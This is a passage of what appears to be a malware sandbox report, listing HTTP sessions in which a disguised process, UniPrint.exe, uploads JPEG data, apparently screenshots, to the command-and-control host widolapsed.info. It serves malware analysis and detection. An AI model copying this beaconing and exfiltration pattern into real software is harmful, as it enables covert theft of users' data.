                                                                                                      2021-09-15 11:46:43 UTC2726OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:43 UTC2742OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:43 UTC2758OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:43 UTC2774OUTData Raw: 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c
                                                                                                      Data Ascii: (((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4L
                                                                                                      2021-09-15 11:46:43 UTC2784OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 30 33 31 38 34 37 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1730318477--
                                                                                                      2021-09-15 11:46:44 UTC2784INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:43 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=e5f0bc01e65adfb878ebf44a9d0fad746c2406c9782b10156b0abc72510e5b10; expires=Thu, 15-Sep-2022 11:46:43 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:44 UTC2785INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.34982745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:45 UTC2785OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76649
                                                                                                      Content-Type: multipart/form-data; boundary=--------2667398164
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 36 37 33 39 38 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2667398164Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 91 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:45 UTC2801OUTData Raw: b2 45 35 e3 1a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f6 65 35 e3 3a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f4 32 cf 8a 47 2e 2f 64 50 a5 a4 a5 af 64 e2 0a 31 45 14 08 31 5e 9f f0 a7 8d 26 fb fe bb 8f fd 06 bc c2 bd 3b e1 57 fc 82 6f bf eb b8 ff 00 d0 6b 3a bf 09 a5 3f 88 ee a9 2b 26 c6 d6 07 d2 6d ae 6e 67 ba cb 40 b2 48 e6 ee 50 3e e8 24 fd ea b2 96 16 b2 46 af 1c d7 4c ac 32 08 bc 97 04 7f df 55 8b 8c 53 df f0 ff 00 82 68 a5 26 b6 fc 7f e0 15 35 48 2d 6e d2 ea d2 f6 09 24 8e 56 07 88 99 bf 85 46 41 03 af 15 e4 3a fe 97 fd 91 aa 3d a8 72 e9 8d c8 59 4a 9c 1f 50 7b d7 b2 4b 6c b6 b7 96 26 19 2e 3e 79 8a b0 7b 87 70 47 96 e7 a1 24 75 02 bc d7 e2 47 fc 8d 6f ff 00 5c 53 f9 55 c1 59 e9 d4 99 bb ad 7a 1c 9d 25 3b 02 93 15 b5 8c 84 a2 97 14 60 d0 01 de 8a 39 a2 80
                                                                                                      Data Ascii: E5}Ke5:}K2G./dPd1E1^&;Wok:?+&mng@HP>$FL2USh&5H-n$VFA:=rYJP{Kl&.>y{pG$uGo\SUYz%;`9
                                                                                                      2021-09-15 11:46:45 UTC2817OUTData Raw: a4 a2 8a d4 c4 5a 29 29 68 00 a2 8a 28 10 b4 52 52 d2 00 a2 8a 28 10 52 d2 52 d2 00 a5 a4 a5 14 08 51 4b 49 4b 48 42 d5 88 1b a0 aa d5 35 bf de a8 96 c6 94 9d a4 6b ea c7 1e 1a 1e ed 5c 4b f5 ae cf 59 e3 c3 49 fe f5 71 6e 79 ac 70 bf 03 f5 3d 4a ff 00 1a f4 3b d1 c7 87 6c be 82 a8 e6 ae b7 1e 1f b1 1f ec 8f e5 54 6b 9e 8f 5f 53 4c 43 f7 97 a0 b9 a3 34 94 95 b1 cf 71 d9 a5 0d 4d 14 51 60 4c 7e 4d 3b 71 f5 a6 0a 5a 96 8b 4d 92 06 34 e0 c6 a2 14 ec d4 b4 52 93 25 0e 7d 69 c2 66 1d 18 d4 20 d2 d4 b8 a2 d4 d9 69 6e 64 1f c4 6a 55 bc 71 d7 06 a9 03 4e cd 43 a7 13 45 56 45 f1 79 fd e5 06 97 cf 85 be f4 62 a8 66 94 31 a9 74 91 6a ab 2f 6d b4 7e a9 8a 4f b1 da 37 43 8a aa 18 d3 83 1a 9e 56 b6 65 29 c5 ee 89 4e 99 19 fb af 4c 6d 2d bf 85 c1 a0 39 ec 4d 48 26 71 fc
                                                                                                      Data Ascii: Z))h(RR(RRQKIKHB5k\KYIqnyp=J;lTk_SLC4qMQ`L~M;qZM4R%}if indjUqNCEVEybf1tj/m~O7CVe)NLm-9MH&q
                                                                                                      2021-09-15 11:46:45 UTC2833OUTData Raw: 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97
                                                                                                      Data Ascii: SnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
                                                                                                      2021-09-15 11:46:45 UTC2849OUTData Raw: 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97
                                                                                                      Data Ascii: 0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa6
                                                                                                      2021-09-15 11:46:45 UTC2860OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 36 37 33 39 38 31 36 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2667398164--
                                                                                                      2021-09-15 11:46:45 UTC2860INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:45 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=95c8eef47be40b461fa65fa0ce34dbbc096bd99e0323a8e15a95747c4c938bb4; expires=Thu, 15-Sep-2022 11:46:45 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:45 UTC2860INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.34982845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:46 UTC2860OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76622
                                                                                                      Content-Type: multipart/form-data; boundary=--------2156489369
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 35 36 34 38 39 33 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2156489369Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:46 UTC2877OUTData Raw: 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 99 4d 78 ce bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02
                                                                                                      Data Ascii: #_RfMx#_Rf)i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4wh
                                                                                                      2021-09-15 11:46:46 UTC2893OUTData Raw: df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09
                                                                                                      Data Ascii: (1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R
                                                                                                      2021-09-15 11:46:46 UTC2909OUTData Raw: d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b
                                                                                                      Data Ascii: :_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc
                                                                                                      2021-09-15 11:46:46 UTC2925OUTData Raw: a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d
                                                                                                      Data Ascii: !i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi
                                                                                                      2021-09-15 11:46:46 UTC2935OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 35 36 34 38 39 33 36 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2156489369--
                                                                                                      2021-09-15 11:46:47 UTC2935INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:46 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=7f6e6f1c3f4eb8b5923f86e1d66b2231ae7327e56c8929b4a31c431b6ba531d9; expires=Thu, 15-Sep-2022 11:46:46 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:47 UTC2936INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.34982945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
